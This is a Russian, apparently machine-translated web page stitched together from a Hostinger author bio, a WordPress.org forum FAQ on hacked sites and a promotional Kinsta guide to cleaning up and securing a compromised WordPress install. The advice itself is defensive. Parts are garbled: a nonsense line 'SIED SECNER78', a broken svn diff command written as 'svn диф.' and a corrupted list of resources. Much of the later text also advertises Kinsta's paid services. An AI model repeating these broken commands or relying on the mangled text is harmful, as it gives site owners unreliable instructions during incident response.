Джордана — писатель цифрового контента в Hostinger. Обладая знаниями в области информационных систем и разработки веб-сайтов, она стремится помочь начинающим разработчикам и предпринимателям развивать свои технические навыки. В свободное время она путешествует и занимается писательским фристайлом.
Еще от Jordana A.
Часто задаваемые вопросы Мой сайт был взломан — Форумы WordPress.org
Темы
- Помощь Я думаю, что меня взломали
- Несколько шагов
- Другие ресурсы
Взлом может стать одним из самых неприятных переживаний в вашем онлайн-путешествии. Однако, как и в большинстве других вещей, прагматичный подход может помочь вам сохранить здравомыслие. При этом выходя за рамки проблем с минимальным воздействием.
Взлом — очень двусмысленный термин, который сам по себе мало что дает для понимания того, что именно произошло. Чтобы убедиться, что вы получите необходимую помощь через форумы, убедитесь, что понимаете конкретные симптомы, которые заставляют вас думать, что вас взломали. Они также известны как индикаторы компрометации (IoC).
Несколько IoC, которые являются явными индикаторами взлома, включают:
- Веб-сайт занесен в черный список Google, Bing и т. д.
- Хост отключил ваш веб-сайт их настольные AV помечают ваш сайт
- Связались с вами, что ваш сайт используется для атаки на другие сайты
- Обратите внимание на несанкционированное поведение (например, создание новых пользователей и т. д.)
- Вы можете увидеть, что ваш сайт был взломан, когда вы открываете его в браузере
Не все взломы созданы равными, поэтому, когда вы участвуете в форумах, имейте это в виду. Если вы сможете лучше понять симптомы, команды будут лучше подготовлены для оказания помощи.
Ниже вы найдете ряд шагов, которые помогут вам начать работу после взлома. Они не охватывают все, так как было бы непрактично учитывать каждый сценарий, но они разработаны, чтобы помочь вам продумать процесс.
Наверх ↑
Сохраняйте спокойствие.
При решении проблемы безопасности как владелец веб-сайта вы, вероятно, испытываете чрезмерное напряжение. Часто это самое уязвимое место, которое вы обнаружили с тех пор, как оказались в сети, и это противоречит тому, что все говорили вам: «Эй, WordPress — это просто!»
Хорошая новость: еще не все потеряно! Да, вы можете потерять часть денег. Да, вы можете нанести удар по своему бренду. Да, вы поправитесь от этого.
Итак, да, сделайте шаг назад и успокойтесь. Это позволит вам более эффективно контролировать ситуацию и восстановить свое присутствие в Интернете.
Документ.
Первый шаг, который необходимо предпринять после компрометации, — документирование. Найдите минутку, чтобы задокументировать то, что вы испытываете, и, если возможно, время. Несколько вещей, которые вы должны иметь в виду:
- Что вы видите, что заставляет вас поверить, что вас взломали?
- Когда вы заметили эту проблему? Какой часовой пояс?
- Какие действия вы недавно предприняли? Был ли установлен новый плагин? Вы изменили тему? Изменить виджет?
Вы создаете основу для того, что распознается как отчет об инциденте. Планируете ли вы самостоятельно реагировать на инциденты или привлечь профессиональную организацию, этот документ со временем станет бесценным.
Также рекомендуется уделить немного времени комментированию сведений о вашей хост-среде. Это потребуется на каком-то этапе процесса реагирования на инциденты.
Просканируйте свой сайт.
При сканировании вашего веб-сайта у вас есть несколько различных способов сделать это, вы можете использовать внешние удаленные сканеры или сканеры уровня приложения. Каждый из них предназначен для просмотра и сообщения о разных вещах. Ни одно решение не является лучшим подходом, но вместе вы значительно повышаете свои шансы.
Сканеры на основе приложений (плагины):
- Quttera
- GOTMLS
- WordFence
- SUCURI
SIED SECNER78. плагины безопасности доступны в репозитории WP. Аннотированные выше существуют уже давно, и за каждым из них стоят сильные сообщества.
Просканируйте локальную среду.
В дополнение к сканированию вашего веб-сайта вы должны начать сканирование локальной среды. Во многих случаях источник атаки/заражения начинается с вашего локального компьютера (например, ноутбука, рабочего стола и т. д.). Злоумышленники запускают трояны локально, которые позволяют им перехватывать информацию о доступе к таким вещам, как FTP и /wp-admin, которые позволяют им войти в систему как владелец сайта.
Убедитесь, что на вашем локальном компьютере выполняется полная проверка на наличие вирусов и вредоносных программ. Некоторые вирусы хорошо обнаруживают антивирусное ПО и прячутся от него. Так что, может быть, попробовать другой. Этот совет распространяется на компьютеры с Windows, OS X и Linux.
Уточните у своего хостинг-провайдера.
Взлом мог затронуть не только ваш сайт, особенно если вы используете виртуальный хостинг. Стоит проконсультироваться с вашим хостинг-провайдером на случай, если они предпринимают какие-либо шаги или нуждаются в этом. Ваш хостинг-провайдер также может подтвердить, является ли взлом фактическим взломом или, например, потерей обслуживания.
Одним из очень серьезных последствий взлома в наши дни является черный список электронной почты. Это, кажется, происходит все больше и больше. Поскольку веб-сайты используются для рассылки СПАМ-писем, органы управления черным списком электронной почты помечают IP-адреса веб-сайтов, и эти IP-адреса часто связаны с тем же сервером, который используется для электронной почты. Лучшее, что вы можете сделать, это обратиться к поставщикам электронной почты, таким как Google Apps, когда дело доходит до потребностей вашего бизнеса.
Помните о черных списках веб-сайтов.
Проблемы с черным списком Google могут нанести ущерб вашему бренду. В настоящее время они заносят в черный список от 9 500 до 10 000 веб-сайтов в день. Это число растет ежедневно. Существуют различные формы предупреждений, от больших заставок, предупреждающих пользователей держаться подальше, до более тонких предупреждений, которые появляются на страницах результатов вашей поисковой системы (SERP).
Несмотря на то, что Google является одним из наиболее известных, существует ряд других организаций, включенных в черный список, таких как Bing, Yahoo и широкий спектр настольных антивирусных приложений. Поймите, что ваши клиенты/посетители веб-сайта могут использовать любое количество инструментов, и любой из них может быть причиной проблемы.
Рекомендуется зарегистрировать свой сайт в различных онлайн-консолях для веб-мастеров, таких как:
- Google Search Console
- Bing Webmaster
- Yandex Webmaster
- Norton Webmaster
. Улучшите управление доступом.
Вы часто слышите, как люди говорят об обновлении таких вещей, как пароли. Да, это очень важная часть, но это одна маленькая часть в гораздо большей проблеме. Нам нужно улучшить нашу общую позицию, когда дело доходит до контроля доступа. Это означает использование для начала сложных, длинных и уникальных паролей. Лучшая рекомендация — использовать генератор паролей, подобный тем, которые можно найти в таких приложениях, как 1Password и LastPass.
Помните, что это включает изменение всех точек доступа. Когда мы говорим о точках доступа, мы имеем в виду такие вещи, как FTP / SFTP, WP-ADMIN, CPANEL (или любую другую панель администратора, которую вы используете на своем хосте) и MYSQL.
Это также выходит за рамки вашего пользователя и должно включать всех пользователей, имеющих доступ к среде.
Также рекомендуется рассмотреть возможность использования какой-либо формы двухфакторной/многофакторной системы аутентификации. В самой простой форме он вводит и требует вторую форму аутентификации при входе в ваш экземпляр WordPress.
Некоторые из подключаемых модулей, доступных для помощи в этом, включают:
- Rublon
- Duo
Сбросить все права доступа.
Как только вы обнаружите взлом, одним из первых шагов, который вы захотите сделать, является блокировка вещей, чтобы вы могли свести к минимуму любые дополнительные изменения. Первое, с чего нужно начать, — это ваши пользователи. Вы можете сделать это, принудительно сбросив глобальный пароль для всех пользователей, особенно для администраторов.
Вот плагин, который может помочь с этим шагом:
- Безопасность iThemes
Вы также хотите удалить всех пользователей, которые могут активно входить в WordPress. Вы делаете это, обновляя секретные ключи в wp-config. Вам нужно будет создать здесь новый набор: генератор ключей WordPress. Возьмите эти значения, а затем перезапишите значения в вашем файле wp-config.php новыми. Это заставит любого, кто все еще может войти в систему, выйти из системы.
Создать резервную копию.
Надеюсь, у вас есть резервная копия вашего веб-сайта, но если ее нет, сейчас самое время ее создать. Резервные копии — это важная часть продолжения вашей работы, и вы должны активно планировать ее продвижение вперед. Вы также должны спросить своего хоста, какова их политика в отношении резервного копирования. Если у вас есть резервная копия, вы сможете выполнить восстановление и навыки прямо в судебно-медицинской экспертизе.
Примечание: важно регулярно делать резервные копии базы данных и файлов. Если это когда-нибудь повторится.
В любом случае, прежде чем перейти к следующему этапу очистки, рекомендуется сделать еще один снимок окружающей среды. Даже если он заражен, в зависимости от типа взлома, последствия могут вызвать множество проблем, и в случае катастрофического сбоя у вас будет хотя бы эта плохая копия, на которую можно ссылаться.
Найти и удалить взлом.
Это будет самая сложная часть всего процесса. Поиск и удаление взлома. Точные шаги, которые вы предпримете, будут зависеть от ряда факторов, включая, помимо прочего, симптомы, указанные выше. То, как вы подойдете к проблеме, будет определяться вашими техническими способностями при работе с веб-сайтами и веб-серверами.
Однако, чтобы помочь в этом процессе, мы включили ряд различных ресурсов, которые должны помочь вам в этом процессе:
- Ваш сайт WordPress был взломан?
- Как очистить взломанную установку
- Как очистить взломанный сайт WordPress
- Как справиться со взломанным сайтом
- Четыре заражения вредоносным ПО
- Как очистить взломанный WordPress
Может возникнуть соблазн удалить все и заманчиво начать сначала. В некоторых случаях это возможно, но во многих случаях это просто невозможно. Однако вы можете переустановить определенные элементы сайта, не затрагивая ядро вашего сайта. Вы всегда хотите убедиться, что переустанавливаете ту же версию программного обеспечения, которую использует ваш веб-сайт, если вы выберете более старую или более новую версию, вы, вероятно, убьете свой веб-сайт. При переустановке не используйте параметры переустановки в файле WP-ADMIN. Используйте приложение FTP/SFTP для перетаскивания версий. Это окажется гораздо более эффективным в долгосрочной перспективе, поскольку эти установщики часто перезаписывают существующие файлы, а хакеры часто добавляют новые файлы… Вы можете безопасно заменить следующие каталоги:
- /wp-admin
- /wp-includes
Отсюда рекомендуется более внимательно обновлять и заменять файлы при перемещении по wp-контенту, поскольку он содержит файлы вашей темы и плагинов.
Единственный файл, который вам обязательно нужно посмотреть, это ваш файл . htaccess. Это один из наиболее распространенных файлов, независимо от типа заражения, который чаще всего обновляется и используется для гнусных действий. Этот файл часто находится в корне папки установки, но также может быть встроен в несколько других каталогов той же установки.
Независимо от типа заражения, есть некоторые общие файлы, за которыми вам нужно следить во время процесса исправления. К ним относятся:
- index.php
- header.php
- footer.php
- function.php
При изменении эти файлы обычно могут отрицательно повлиять на все запросы страниц, что делает их мишенями для злоумышленников.
Используйте возможности сообщества
Мы часто забываем, что наша платформа основана на сообществе, а это значит, что если у вас возникнут проблемы, кто-то из сообщества, скорее всего, протянет вам руку помощи. Очень хорошим местом для начала, если вы ограничены в деньгах или просто ищете руку помощи, является форум WordPress. org Hacked or Malware.
Обновление!
После того, как вы очиститесь, вы должны обновить установку WordPress до последней версии программного обеспечения. Старые версии более подвержены взлому, чем новые версии.
Снова смените пароли!
Помните, что вам необходимо изменить пароли для вашего сайта после , чтобы убедиться, что ваш сайт чист. Поэтому, если вы изменили их только после того, как обнаружили взлом, измените их снова сейчас. Опять же, не забывайте использовать сложные, длинные и уникальные пароли.
Вы можете изменить учетную запись пользователя и пароль базы данных. Когда вы изменили их, не забудьте добавить их в файл wp-config.php.
Судебная экспертиза.
Криминалистика — это процесс понимания того, что произошло. Как злоумышленники проникли внутрь? Цель состоит в том, чтобы понять вектор атаки, который использовал злоумышленник, чтобы гарантировать, что он не сможет снова злоупотребить им. Во многих случаях владельцам веб-сайтов очень сложно провести такой анализ из-за отсутствия технических знаний и/или доступных данных. Если у вас есть необходимые метаданные, есть такие инструменты, как OSSEC и splunk, которые могут помочь вам синтезировать данные.
Защитите свой сайт.
Теперь, когда вы успешно восстановили свой сайт, защитите его, применив некоторые (если не все) рекомендуемые меры безопасности.
Не удается войти в панель администратора WordPress
Бывают случаи, когда злоумышленники захватывают вашу учетную запись администратора. Это не повод для паники, есть несколько разных вещей, которые вы можете сделать, чтобы восстановить контроль над своей учетной записью. Вы можете выполнить следующие шаги, чтобы сбросить пароль
Такие инструменты, как phpMyAdmin и Adminer, часто доступны через вашего хостинг-провайдера. Они позволяют вам войти в вашу базу данных напрямую, минуя ваш экран администрирования и сбрасывая вашего пользователя в таблице пользователей wp_users
.
Если вы не хотите возиться с хэшами паролей или не можете их понять, просто обновите адрес электронной почты и вернитесь на экран входа в систему, нажмите «Забыли пароль» и дождитесь письма.
Используете систему контроля версий?
Если вы используете контроль версий, может быть очень удобно быстро определить, что изменилось, и вернуться к предыдущей версии веб-сайта. Из терминала или командной строки вы можете сравнить свои файлы с версиями, хранящимися в официальном репозитории WordPress.
$ svn диф.
или сравните конкретный файл:
$ SVN DIFF/PATH/TO/FILENAME
TOP ↑
- Hacked WordPress Backdoors (Ottopress)
- WordPress Security — Security Security BS (Suckuri)
- WordPress Securit Почты (скоропортящиеся прессы)
Что делать, если ваш сайт в беде
Сайт WordPress взломан. Если это случится с вами, есть искушение запаниковать. В этом посте я помогу вам определить, был ли ваш сайт взломан, проведу шаги по его очистке и помогу сделать его более безопасным.
Наконец, я дам вам несколько советов, как предотвратить повторный взлом вашего сайта WordPress в будущем.
Готов? Сделайте глубокий вдох, и давайте начнем.
Ваш сайт WordPress работает не так, как должен. Но как узнать, что проблема связана со взломом? Давайте рассмотрим некоторые из признаков того, что ваш сайт был взломан:
- Вы не можете войти в систему.
- Ваш сайт изменился без вашего участия (например, домашняя страница была заменена статической страницей или был добавлен новый контент).
- Ваш сайт перенаправляет на другой сайт.
- Когда вы или другие пользователи пытаетесь получить доступ к вашему сайту, вы получаете предупреждение в своем браузере.
- Когда вы ищете свой сайт, Google выдает предупреждение о том, что он мог быть взломан.
- Вы получили уведомление от подключаемого модуля безопасности о взломе или неожиданном изменении.
- Ваш хостинг-провайдер предупредил вас о необычной активности в вашей учетной записи.
Давайте рассмотрим каждый из них более подробно.
Вы не можете войти в систему
Если вы не можете войти на свой сайт, это может быть признаком того, что ваш сайт был взломан. Однако более вероятно, что вы просто забыли свой пароль. Поэтому, прежде чем предположить, что вас взломали, попробуйте сбросить пароль. Если вы не можете, это тревожный знак. Даже если вы можете, вас все равно могут взломать, и вам придется провести еще немного расследования.
Хакеры иногда удаляют пользователей или меняют пароли пользователей, чтобы предотвратить доступ. Если вы не можете сбросить пароль, ваша учетная запись могла быть удалена, что является признаком взлома.
Ваш сайт изменился
Одной из форм взлома является замена домашней страницы статической страницей. Если ваш сайт выглядит совершенно по-другому и не использует вашу тему, вероятно, он был взломан.
Изменения могут быть более тонкими, например, добавление ложного контента или ссылок на сомнительные сайты. Если ваш нижний колонтитул полон ссылок, которые вы не добавляли, и особенно если эти ссылки скрыты или имеют крошечный размер шрифта, вас могли взломать.
Прежде чем предположить, что вас взломали, уточните у других администраторов или редакторов сайта, не внесли ли они изменения случайно.
Если ваша тема не из надежного источника и вы недавно обновили ее, это может быть причиной.
Ваш сайт перенаправляет
Иногда хакеры добавляют сценарий, который перенаправляет людей на другой сайт, когда они посещают ваш. Вероятно, это будет сайт, на который вы не хотите, чтобы перенаправляли ваших пользователей.
Это случилось со мной, когда управляемый мной школьный сайт перенаправлял на сайт знакомств. Как вы можете себе представить, мой клиент был недоволен, и ему пришлось бросить все, что я делал, и немедленно все исправить. Оказалось, что это была небезопасность на сервере, а не на моем сайте, что является одной из причин использовать только качественный хостинг. Я сменил хостинг-провайдера как можно скорее и почти сразу же исправил взлом.
Предупреждения браузера
Если ваш браузер предупреждает, что ваш сайт взломан, это может быть признаком того, что ваш сайт был взломан. Это также может быть связано с некоторым кодом в теме или плагине, который необходимо удалить, или проблемой с доменами или SSL.
Обратитесь к совету, данному вместе с предупреждением в вашем браузере, чтобы помочь вам диагностировать проблему.
Предупреждения поисковой системы
При поиске вашего сайта, если он был взломан, Google может отображать предупреждение. Это может означать, что карта сайта была взломана, что повлияет на то, как Google сканирует ваш сайт. Или это может быть более серьезной проблемой: вам нужно будет провести диагностику ниже, чтобы точно узнать, что произошло.
Предупреждение Google — этот сайт мог быть взломанПочему сайты WordPress подвергаются взлому
Существует множество причин взлома сайтов WordPress, но вот обзор наиболее распространенных факторов .
1. Небезопасные пароли
Это одна из наиболее частых причин взлома. Самый часто используемый пароль в мире — «password». Безопасные пароли необходимы не только для вашей учетной записи администратора WordPress, но и для всех ваших пользователей и всех аспектов вашего сайта, включая FTP и хостинг.
2. Устаревшее программное обеспечение
Плагины и темы, а также сам WordPress подлежат обновлениям безопасности, которые необходимо установить на ваш сайт. Если вы не обновляете свои темы, плагины и версию WordPress, вы делаете свой сайт уязвимым.
3. Небезопасный код
Плагины и темы, полученные из ненадежных источников, могут создавать уязвимости на вашем сайте. Если вам нужны бесплатные темы или плагины WordPress, установите их из официального каталога тем.
При покупке премиальных тем и плагинов обязательно проверяйте репутацию поставщика и получайте рекомендации от людей и источников, которым вы доверяете. Никогда не устанавливайте плагины с нулевым значением, которые являются премиальными плагинами с бесплатных сайтов, предназначенными для причинения вреда или сбора информации.
Как взламывают WordPress?
Если вы хотите узнать больше о том, как взламываются сайты WordPress (и не торопитесь с действиями, которые нужно предпринять, если ваш собственный сайт был взломан), вот основные пути, по которым хакеры могут проникнуть на ваш сайт:
- Бэкдоры — они обходят обычные методы доступа к вашему сайту, например. через скрипты или скрытые файлы. Примером может служить уязвимость Tim Thumb в 2013 году.
- Pharma hacks — эксплойт, используемый для вставки мошеннического кода в устаревшие версии WordPress.
- Попытки входа в систему методом перебора — когда хакеры используют автоматизацию для использования слабых паролей и получения доступа к вашему сайту.
- Вредоносные перенаправления — когда бэкдоры используются для добавления вредоносных перенаправлений на ваш сайт.
- Межсайтовый скриптинг (XSS) — наиболее распространенная уязвимость, встречающаяся в плагинах WordPress, это скрипты внедрения, которые затем позволяют хакеру отправить вредоносный код в браузер пользователя.
- Отказ в обслуживании (DoS) — когда ошибки или ошибки в коде веб-сайта используются для перегрузки веб-сайта, поэтому он больше не работает.
Если вы используете сайт электронной коммерции, обязательно прочитайте наше подробное руководство по предотвращению мошенничества в электронной торговле.
Все это звучит довольно пугающе, но есть шаги, которые вы можете предпринять, чтобы защитить свой сайт WordPress от них. Во-первых, давайте рассмотрим шаги, которые необходимо предпринять, когда ваш сайт взломан.
Взлом сайта WordPress: что делать (пошаговое руководство)
Если ваш сайт размещен на Kinsta, у нас есть гарантия отсутствия взлома, что означает, что мы проработаем ваш сайт и удалим взлом. Если вы работаете с другим хостинг-провайдером, вам нужно будет привлечь его, но, возможно, вам придется многое сделать самостоятельно.
Гарантия Kinsta на отсутствие взломаШаги, которые вам необходимо предпринять, будут зависеть от того, каким образом ваш сайт был взломан, и вам может не понадобиться прорабатывать все это. Шаги, которые мы пройдем:
- Не паникуйте
- Переведите свой сайт в режим обслуживания
- Сброс паролей
- Используйте службу удаления вредоносных программ Kinsta
- Обновление плагинов и тем
- Удалить пользователей
- Удалить ненужные файлы
- Очистить карту сайта
- Переустановите плагины и темы
- Переустановите ядро WordPress
- Очистить базу данных
Шаг 1: Не паникуйте
Я знаю, что самое худшее, что вы можете сказать тому, кто паникует, это «не паникуй». Но у вас должна быть ясная голова, если вы хотите диагностировать и решить проблему.
Если вы не можете ясно мыслить, просто переведите свой сайт в режим обслуживания и оставьте его на несколько часов, пока не почувствуете себя спокойнее. Что, опять же, звучит легче сказать, чем сделать, но здесь это имеет решающее значение.
Шаг 2. Переведите свой сайт в режим обслуживания
Вы не хотите, чтобы посетители обнаружили ваш сайт в скомпрометированном состоянии, и вы также не хотите, чтобы они видели, как будет выглядеть ваш сайт, пока вы его исправляете.
Так что переведите его в режим обслуживания, если можете.
Если вы не можете войти на свой сайт WordPress прямо сейчас, это будет невозможно, но как только вы сможете, вернитесь и сделайте это.
Такой плагин, как Coming Soon Page & Maintenance Mode, позволит вам перевести ваш сайт в режим обслуживания, создав впечатление, что он проходит плановое обслуживание, а не исправляется после взлома.
Скоро появится плагин Page & Maintenance ModeПосле того, как вы это сделаете, вы можете немного расслабиться, зная, что люди не могут видеть, что происходит.
Вы можете настроить плагин, чтобы добавить логотип и настроить цвета, или вы можете просто ввести какой-нибудь пояснительный текст и остановиться на этом.
Теперь вы можете видеть свой неработающий сайт, а другие люди — нет.
Шаг 3. Воспользуйтесь службой удаления вредоносных программ Kinsta
Чтобы избавить себя от необходимости выполнения всех описанных ниже действий, вы можете приобрести услугу удаления вредоносных программ Kinsta за единовременную плату в размере 100 долларов США при переходе на Kinsta. Важно: если вы являетесь клиентом Kinsta, это включено в ваш план!
Если вы не хотите этого делать или не можете себе это позволить, читайте дальше, чтобы узнать больше о том, как очистить свой взломанный сайт.
Шаг 4. Сброс паролей
Поскольку вы не знаете, какой пароль использовался для доступа к вашему сайту, важно изменить их все, чтобы хакер не смог их снова использовать. Это не ограничивается вашим паролем WordPress: сбросьте пароль SFTP, пароль базы данных и пароль вашего хостинг-провайдера.
Вам необходимо убедиться, что другие пользователи-администраторы также сбрасывают свои пароли.
Шаг 5: Обновите плагины и темы
Следующим шагом будет убедиться, что все ваши плагины и темы обновлены. Перейти к Панель инструментов > Обновите на своем сайте и обновите все, что устарело.
Вы должны сделать это, прежде чем пытаться исправить какие-либо другие исправления, потому что, если плагин или тема делают ваш сайт уязвимым, любые другие исправления, которые вы делаете, могут быть отменены из-за уязвимости. Поэтому убедитесь, что все обновлено, прежде чем продолжить.
Шаг 6: Удаление пользователей
Если на ваш сайт WordPress были добавлены какие-либо учетные записи администратора, которые вы не узнаете, пора их удалить. Перед тем, как это сделать, проверьте у любых авторизованных администраторов, не изменились ли они данные своей учетной записи и вы их просто не узнаете.
Перейдите на экран Users в панели администратора WordPress и щелкните ссылку Administrator над списком пользователей. Если там есть пользователи, которых не должно быть, установите флажок рядом с ними, затем выберите Удалить в раскрывающемся списке Массовые действия .
Шаг 7: Удаление ненужных файлов
Чтобы узнать, есть ли в вашей установке WordPress какие-либо файлы, которых быть не должно, вам потребуется установить плагин безопасности, такой как WordFence, который просканирует ваш сайт и сообщит вам, есть ли там какие-либо файлы, которых там быть не должно, или использовать службу безопасности, такую как Sucuri.
Шаг 8. Очистите карту сайта и повторно отправьте ее в Google
Одной из причин того, что сайт помечен поисковыми системами, может быть взлом файла sitemap.xml. В одном случае, который мы зафиксировали в Kinsta, карта сайта была заражена фиктивными ссылками и иностранными символами.
Вы можете восстановить свою карту сайта с помощью плагина SEO, но вам также нужно будет сообщить Google, что сайт был очищен. Добавьте свой сайт в Google Search Console и отправьте отчет о картах сайта в Google, чтобы сообщить им, что вам нужно просканировать сайт. Это не гарантирует, что ваш сайт будет просканирован немедленно и может занять до двух недель. Вы ничего не можете сделать, чтобы ускорить это, поэтому вам придется набраться терпения.
Шаг 9. Переустановите плагины и темы
Если на вашем сайте все еще есть проблемы, вам нужно будет переустановить все плагины и темы, которые вы еще не обновили. Деактивируйте и удалите их со страниц Темы (вот как безопасно удалить тему WordPress) и Плагины , а затем переустановите их. Если вы еще не перевели свой сайт в режим обслуживания, сделайте это в первую очередь!
Если вы купили плагин или тему у поставщика плагинов или тем и не уверены, насколько они безопасны, самое время подумать, стоит ли вам продолжать их использовать. Если вы загрузили бесплатную тему/плагин из любого места, кроме каталогов плагинов или тем WordPress, не переустанавливайте . Вместо этого установите его из каталога тем или плагинов или купите законную версию. Если вы не можете себе это позволить, замените его бесплатной темой/плагином из каталога тем или плагинов, который выполняет ту же или аналогичную работу.
Если это не решит проблему, проверьте страницы поддержки для всех ваших тем и плагинов. Возможно, у других пользователей возникают проблемы, и в этом случае вам следует удалить эту тему или плагин, пока уязвимость не будет устранена.
Шаг 10: Переустановите WordPress Core
Если ничего не помогает, вам нужно переустановить сам WordPress. Если файлы в ядре WordPress были скомпрометированы, вам необходимо заменить их чистой установкой WordPress.
Загрузите чистый набор файлов WordPress на свой сайт через SFTP, убедившись, что вы перезаписали старые. Рекомендуется сначала сделать резервную копию ваших файлов wp-config.php и .htaccess на случай, если они будут перезаписаны (хотя этого не должно быть).
Если вы использовали автоустановщик для установки WordPress, не используйте его снова, поскольку он перезапишет вашу базу данных, и вы потеряете свой контент. Вместо этого используйте SFTP только для загрузки файлов. Если вы находитесь на Kinsta и использовали наш установщик WordPress, вам все равно не нужно беспокоиться об этом шаге, поскольку мы заменим для вас ядро WordPress в рамках нашей службы исправления взлома.
Шаг 11. Очистите вашу базу данных
Если ваша база данных была взломана, вам также необходимо очистить ее. Рекомендуется очистить вашу базу данных, так как чистая база данных будет содержать меньше устаревших данных и занимать меньше места, что сделает ваш сайт быстрее.
Как узнать, взломали ли вашу базу данных? Если вы используете подключаемый модуль или службу безопасности, запустив сканирование через него, вы узнаете, была ли взломана база данных (или, возможно, вам было отправлено предупреждение). Кроме того, вы можете использовать плагин, такой как NinjaScanner, который будет сканировать вашу базу данных.
Плагин WP-Optimize позволит вам очистить вашу базу данных и оптимизировать ее на будущее.
Как предотвратить взлом вашего сайта WordPress
Итак, вы очистили свой сайт и сбросили пароли, чтобы он стал немного более безопасным, чем раньше.
Но вы можете сделать больше, чтобы предотвратить будущие взломы и избежать повторения того же самого.
1. Убедитесь, что все пароли безопасны
Если вы еще этого не сделали, убедитесь, что все пароли, относящиеся к вашему веб-сайту, а не только пароль администратора WordPress, сброшены, и что вы используете надежные пароли.
Плагин безопасности позволит вам заставить пользователей использовать безопасные пароли, или, если вы используете Kinsta, он встроен в ваш план хостинга.
Вы также можете добавить на свой сайт двухфакторную аутентификацию, чтобы хакерам было сложнее создать учетную запись.
2. Обновляйте свой сайт
Важно поддерживать ваш сайт в актуальном состоянии. Каждый раз, когда ваша тема, плагины или сам WordPress обновляются, вы должны запускать это обновление, так как оно часто включает исправления безопасности.
Вы можете включить автоматическое обновление, отредактировав файл wp-config.php или установив плагин, который сделает это за вас. Если вы не хотите этого делать, потому что хотите сначала протестировать обновления, плагин безопасности уведомит вас, когда вам нужно запустить обновление.
Когда вы обновляете свой сайт, убедитесь, что вы делаете это правильно, создавая резервную копию и тестируя обновления на промежуточном сервере, если он у вас есть. Планы Kinsta включают автоматическое резервное копирование и промежуточную среду для всех сайтов.
3. Не устанавливайте небезопасные плагины или темы
При установке плагинов WordPress в будущем убедитесь, что они были протестированы с вашей версией WordPress и что вы загружаете их из надежного источника.
Всегда устанавливайте бесплатные плагины и темы через каталоги тем и плагинов: не поддавайтесь искушению получить их со сторонних сайтов. Если вы покупаете премиальные темы или плагины, проверьте репутацию поставщика плагинов и попросите рекомендации.
4. Очистите установку WordPress
Если у вас установлены темы или плагины, но они не активированы, удалите их. Если у вас есть какие-либо файлы или старые установки WordPress в вашей среде хостинга, которые вы не используете, пришло время удалить их. Удалите все базы данных, которые вы не используете.
Если на вашем сервере есть старые, неиспользуемые установки WordPress, они будут особенно уязвимы, так как вы вряд ли будете поддерживать их в актуальном состоянии.
5. Установите SSL на свой сайт
SSL добавит уровень безопасности вашему сайту и является бесплатным. Планы Kinsta включают SSL без дополнительной платы. Если ваш хостинг-провайдер не предоставляет бесплатный SSL, вы можете использовать плагин SSL Zen, чтобы добавить бесплатный Let’s Encrypt SSL.
6. Избегайте дешевого хостинга
Дешевый хостинг означает, что вы будете делить место на сервере с сотнями других клиентов. Это не только замедлит работу вашего сайта, но также повысит вероятность того, что один из этих других сайтов поставит сервер под угрозу.
Дешевые хостинг-провайдеры с меньшей вероятностью будут тщательно следить за безопасностью сервера или помогать вам, если ваш сайт взломан. Качественный хостинг-провайдер, такой как Kinsta, даст вам гарантию защиты от взлома и приложит все усилия для обеспечения безопасности вашего сайта.
7. Настройте брандмауэр
Плагин безопасности или служба, такая как Cloudflare или Sucuri, позволит вам настроить брандмауэр для вашего сайта. Это добавит дополнительный барьер для хакеров и уменьшит вероятность взлома и DDoS-атак на ваш сайт.
Здесь, в Kinsta, все сайты WordPress наших клиентов защищены корпоративным брандмауэром Google. Мы также предоставляем пользователям простой в использовании инструмент IP Deny в MyKinsta для блокировки вредоносных IP-адресов.
8. Установите плагин безопасности
Если вы установите плагин безопасности на свой сайт, он будет уведомлять вас о любых подозрительных действиях. Это может включать несанкционированный вход в систему или добавление файлов, которых там быть не должно.
Опять же, обратитесь к предупреждению плагина, чтобы понять, в чем проблема.
Напоминание: если ваш сайт размещен на Kinsta, вам не нужно устанавливать плагины безопасности. Это потому, что Kinsta предоставляет все необходимые функции безопасности.
9. Подумайте о службе безопасности
Если вы не являетесь пользователем Kinsta, вы можете рассмотреть возможность использования службы безопасности, такой как Sucuri, которая будет следить за вашим сайтом и исправлять его, если вас снова взломают.
SucuriЭто не дешево, но если ваш веб-сайт важен для дохода вашего бизнеса, он может окупить себя. Существуют разные планы, предлагающие разное время выполнения исправлений безопасности. Sucuri будет следить за вашим сайтом, предупреждать вас о нарушениях безопасности и устранять их для вас. Это означает, что вам не нужно снова проходить процесс очистки вашего сайта самостоятельно.
В качестве альтернативы, планы хостинга Kinsta включают функции безопасности, включая обнаружение DDoS, мониторинг времени безотказной работы, аппаратные стены и гарантию отсутствия взлома, что означает, что если ваш сайт взломан, мы очистим его для вас. Если вы перейдете на Kinsta, мы бесплатно перенесем ваш сайт и очистим его, если он будет взломан в будущем. Обязательно ознакомьтесь с нашим тщательно подобранным списком лучших плагинов миграции WordPress.
OMG… Ваш сайт был взломан! 😭😱Что делать дальше, чтобы почистить? Вот все шаги, которые вы должны отметить в своем списке восстановления, чтобы ваш сайт был на 100% защищен от взлома ✅Нажмите, чтобы твитнутьРезюме
Взлом вашего веб-сайта — неприятное событие. Это означает, что ваш сайт недоступен для пользователей, что может повлиять на ваш бизнес.